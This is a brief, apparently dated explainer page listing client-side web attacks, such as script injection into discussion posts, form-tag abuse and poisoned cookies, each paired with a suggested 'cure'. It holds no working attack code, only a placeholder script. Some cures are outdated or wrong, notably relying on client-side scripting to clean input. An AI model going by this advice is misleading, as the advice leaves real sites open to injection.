subject: What are Client-side web attacks? [print this page] What are Client-side web attacks? What are Client-side web attacks?
Web Attacks can take place on the user's end, in which case they are called client-side attacks. Client-side web attacks include the following: Malicious HTML tags in web requests
Malicious code in a form window can cause the server to generate pages that are unpredictable or dangerous if run on the server. Malformed pages sent back to the client for execution may cause further problems.
Cure: Webmasters must not allow nonvalidated input. Use client-side scripting to clean up form data before it is transmitted. Malicious code from other clients
A web site with a discussion group may be open to attacks of the form:
Hello Buddy- Here is my message!
SCRIPT malicious code SCRIPT
That is all!
If a victim client has scripting enabled, their browser may run this code unexpectedly.
Cure: Users should turn off script functions, web servers should screen for embedded tags that show a script may be present. Clients sending malicious code to themselves
An attacker can slip a client a message or file and encourage them to post it to the server. When the server echoes or displays the posting, the client's machine may execute it.
Cure: Webmasters should screen data, even if the intended recipient is the client that sent it. Abuse of tags
Tags such as FORM, normally harmless enough, can cause trouble if they're embedded at the wrong place. An intruder can trick users into revealing sensitive information by modifying the behavior of an existing form or can display information that may have been held in the form of a previous user. Other HTML tags can alter the appearance of a page, insert unwanted or offensive images or sounds, break things, and otherwise disturb the peace by interfering with the page's intended appearance and behavior.
Cure: Set browser security to high and lower it only for those users you are sure will not violate that trust. Poisoned cookies
While visiting a web site, a simple text file called a cookie is often placed in the user's computer. At the next visit, the web server scans for cookies, and if it locates one, can use the cookie data to recall the previous conversation. A poisoned cookie is one that has been altered to trigger the download of malicious code.
Cure: Keep security settings high until trust is earned. Scan all incoming files (cookies included) for viruses to prevent the injection of malicious code. Using the wrong character set Browsers interpret the information they receive according to the character set chosen by the user. If the user fails to specify a character set, the web server uses a default setting, which can result in garbled displays or unintended meanings. Cure: Users should declare their character set when configuring their browsers.
